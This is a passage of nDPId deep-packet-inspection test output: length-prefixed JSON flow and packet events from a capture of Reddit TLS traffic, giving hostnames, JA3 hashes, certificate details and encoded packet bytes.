Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} +01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":508,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} +01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":510,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":516,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686129,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686129,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1605291686129,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686129,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdELkPzEPbiYGyoBJXgE4hAAACBAV4AQMDAwQCCArC1zjcqXTmGA=="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":519,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1605291686129,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686129,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdDvdaN0mUbYB0oBJXgO0tAAACBAV4AQMDAwQCCArC1zjbqXTmGA=="} +01008{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":521,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686129,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686129,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":524,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1605291686129,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686129,"pkt":"qtsDr8lk5EKm5WPyht1gCcfOACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3RABu9uJgbK5D8xEgBAB+9IFAAABAQgKqXTmRcLXONw="} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1605291686129,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686129,"pkt":"qtsDr8lk5EKm5WPyht1gBTHMACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3Q4Bu5RtgHT3WjdKgBAB+3ESAAABAQgKqXTmRcLXONs="} +00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686084,"flow_last_seen":1605291686129,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686129,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":528,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686084,"flow_last_seen":1605291686130,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686130,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01283{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":535,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1605291686035,"flow_last_seen":1605291686137,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":332,"midstream":0,"thread_ts_msec":1605291686137,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} +01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":541,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686137,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686137,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01295{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":554,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686060,"flow_last_seen":1605291686138,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686138,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} +01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":571,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686138,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686138,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01294{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":573,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291686060,"flow_last_seen":1605291686138,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1605291686138,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} +01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":680,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686141,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":686,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686141,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01294{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":688,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686060,"flow_last_seen":1605291686141,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":696,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686064,"flow_last_seen":1605291686141,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01264{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":700,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686064,"flow_last_seen":1605291686142,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}} +01295{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":713,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686060,"flow_last_seen":1605291686144,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686144,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":717,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686064,"flow_last_seen":1605291686144,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686144,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":722,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686064,"flow_last_seen":1605291686145,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686145,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":736,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686064,"flow_last_seen":1605291686146,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686146,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":738,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686064,"flow_last_seen":1605291686146,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686146,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, 